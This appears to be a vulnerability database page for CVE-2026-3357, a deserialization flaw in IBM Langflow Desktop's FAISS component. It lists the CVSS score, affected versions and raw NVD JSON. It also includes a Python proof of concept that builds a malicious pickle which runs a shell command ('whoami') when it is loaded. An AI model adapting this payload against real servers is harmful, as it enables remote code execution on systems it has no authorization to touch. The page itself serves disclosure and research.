Security Vulnerability Report
CVE-2026-3357 CVSS 8.8 HIGH


Published: 2026-04-08 01:16:41
Last Modified: 2026-04-14 21:28:34

Description

IBM Langflow Desktop 1.6.0 through 1.8.2 could allow an authenticated user to execute arbitrary code on the system. The cause is an insecure default setting that permits deserialization of untrusted data in the FAISS component (CWE-502).

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE (CPE match: versions from 1.6.0 up to, but excluding, 1.8.3)
IBM Langflow Desktop 1.6.0
IBM Langflow Desktop 1.6.1
IBM Langflow Desktop 1.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pickle
import os


# A class that runs a system command when it is deserialized:
# pickle calls __reduce__ and invokes the returned callable with its args.
class DeserializationExploit:
    def __reduce__(self):
        # The payload to be executed, e.g. creating a file or running a shell command
        return (os.system, ('whoami',))


# Serialize the malicious object
malicious_data = pickle.dumps(DeserializationExploit())
print(f"[+] Generated malicious payload (Length: {len(malicious_data)})")
print(f"[+] Payload bytes (hex): {malicious_data.hex()}")

# Simulation: in a real attack, 'malicious_data' would be sent to the vulnerable FAISS endpoint.
# The server-side code would look like: pickle.loads(user_input)
# which triggers the exploit.
try:
    # Simulating the vulnerable component processing the data
    print("[+] Simulating server-side deserialization...")
    pickle.loads(malicious_data)
except Exception as e:
    print(f"[-] Error during execution: {e}")
```

References

https://www.ibm.com/support/pages/node/7268428 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-3357",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T01:16:41.057",
    "lastModified": "2026-04-14T21:28:34.113",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.6.0",
                "versionEndExcluding": "1.8.3",
                "matchCriteriaId": "FB101015-F52D-4FE2-BBED-2CFC46ABF673"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7268428",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```